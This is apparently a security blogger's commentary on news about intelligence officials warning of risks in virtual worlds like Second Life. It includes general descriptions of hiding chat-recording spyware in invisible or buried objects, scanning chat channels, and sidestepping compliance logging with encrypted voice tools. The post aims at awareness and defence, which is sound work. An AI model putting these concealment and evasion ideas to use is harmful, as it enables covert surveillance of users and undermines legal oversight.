I find this almost laughable that it took them this long to consider that virtual worlds held risks… let me respond to a few without revealing too much e.g. object entry and sit.

U.S. intelligence officials are cautioning that popular Internet services that enable computer users to adopt cartoon-like personas in three-dimensional online spaces also are creating security vulnerabilities by opening novel ways for terrorists and criminals to move money, organize and conduct corporate espionage.

Over the last few years, “virtual worlds” such as Second Life and other role-playing games have become home to millions of computer-generated personas known as avatars. By directing their avatars, people can take on alternate personalities, socialize, explore and earn and spend money across uncharted online landscapes.

Security researchers have known this for a long time. It was clear to me that it was easier to jack a WoW account, chop shop and move it for far more than a card deal…and trying explaining the theft of your 60 level mage to the cops. “Barney Fife saves the day and takes down another WoW accounts jacker….please return to saving your sector”

The virtual world is the next great frontier and in some respects is still very much a Wild West environment,” a recent paper by the government’s new Intelligence Advanced Research Projects Activity said.

“Unfortunately, what started out as a benign environment where people would congregate to share information or explore fantasy worlds is now offering the opportunity for religious/political extremists to recruit, rehearse, transfer money, and ultimately engage in information warfare or worse with impunity.”

Any medium that gathers mass is going to gather bad apples. In 2003 I explained how they could subvert CPA deals, through rogue networks and generate self-sustaining cells that could launch blended attacks through this funding- trivial. In 2003 accountability just wasn’t that high on the list- it will be now.

Virtual worlds could also become an actual battlefield. The intelligence community has begun contemplating how to use Second Life and other such communities as platforms for cyber weapons that could be used against terrorists or enemies, intelligence officials said. One analyst suggested beginning tests with so-called teams of cyber warfare experts.

The IARPA paper concurred: “What additional things are possible in the virtual world that cannot be done in the real world? The [intelligence community] needs to ‘red team’ some possible scenarios of use.”

Virtual worlds are battlefields- what additional things are possible that cannot be done in the real world? Everything.

compliance

Quick conclude. Publicly traded companies need to ensure communications, now matter how ephemeral are logged. SOX, HIPPA, and e-discovery ensure that is so- this includes IM. Even so it is not hard to jack into a world and run parallel with something like Skype that uses AES encryption and exhibits port agility to evade. I am not sure about SL’s native voip, but again if they wish to offer compliance as a publicly traded company in the US, they MUST log all of this traffic.

Spyware

Spyware abounds in second life and i will bet other worlds. Commonly the use of zero mass tortured-prims, some use alpha textures, or are darted into an Avatar or sprinkled on an area where having zero-mass helps them hide. Best extraction I performed was multiple zero-mass tortured prims using sand as a texture and buried into the beach- each tested positive as scripted- kind of obvious- make your spyware big and. This was a smooth move, but when confronted he was hard pressed to say much. Women are commonly targeted, i frequently get requests for help and based on my experience, it goes on in shops, anywhere.

These can record ambient chat conversation (channel 0) or open chat. Nor does moving up channels help. Brute force channel scanners can help you find commands, executions or conversations. Silent Life sounds quiet, but listen to the right channels and it is quite noisy. Bleys and I built an encrypted HUD (keyboard) as proof of concept. It works great, although requiring mouse input (evades keyboard loggers) it is too slow yet, but was fun in meetings sending messages encrypted and watch scanner rats go WTF? i had another application that would send in all kinds of crazy reports that brute scanner guys must have been puzzled by as I would flood channels in the low range with messages that were worrisome.

Communication is going to happen, it will route around the damage, the best offense is awareness…the list goes on, but Virtual Worlds need more time to mature.

A good start, beyond accountability, would be to allow people to sandbox scripts to see what all they really do- code hygiene…I know it is a script, but what does it do or send?

Coming soon- social engineering in virtual worlds. Far too easy…people need more training…after that prepare for an epic battle…

Popularity: 3% [?]

Share This